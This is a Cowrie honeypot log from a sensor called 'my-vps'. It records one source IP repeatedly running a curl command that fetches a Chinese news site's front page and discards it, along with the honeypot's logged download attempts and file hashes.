{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:38.999559Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.000819Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.036876Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.038017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.046303Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.048239Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.072691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.074305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.085527Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.087074Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.140506Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.142288Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.144752Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.146122Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.185987Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.265351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.266726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.275076Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.295268Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.319862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.321229Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.329597Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.353350Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.356664Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.357776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.371619Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.402107Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.404154Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.444294Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.447106Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.486423Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.487613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.531018Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.532255Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.541314Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.542982Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.557969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.559359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.568922Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.570129Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.600027Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.601267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.605489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.606295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.638990Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.640143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.643354Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.644361Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.653262Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.741182Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.743404Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.744261Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.745141Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.746313Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.748132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.749227Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.751279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.752093Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.756559Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.759003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.777056Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.778787Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.812518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.813327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.816837Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.817639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.841395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.867825Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.873969Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.886526Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.887689Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.889714Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.890754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.899669Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.923244Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.927163Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.928109Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.931125Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.932162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.954463Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.963224Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.965044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.966265Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.969653Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.971794Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:39.973330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:39.974554Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.002749Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.011656Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.013118Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.016986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.017959Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.020926Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.042395Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.072162Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.073464Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.077483Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.078542Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.083243Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.085833Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.120557Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.121752Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.125907Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.127730Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.130187Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.131497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.168729Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.170991Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.203690Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.205209Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.208197Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:40.209948Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:40.212760Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
